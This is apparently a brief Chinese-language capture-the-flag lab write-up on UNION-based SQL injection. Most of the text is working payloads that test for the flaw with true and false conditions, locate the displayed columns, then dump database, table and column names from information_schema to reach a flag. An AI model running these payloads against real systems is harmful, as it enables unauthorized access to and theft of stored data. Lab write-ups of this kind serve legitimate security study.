Pass-01

考点：显错加联合查询

select *from user where id=1

id=1 and 1=1 回显信息

 and  1=2 回显错误

id=1 and 1=2 union select 1,2,3          2,3列回显

 

暴库

id=1 and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata

爆表

id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='error'

爆字段

id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='error_flag'

 

 拿到flag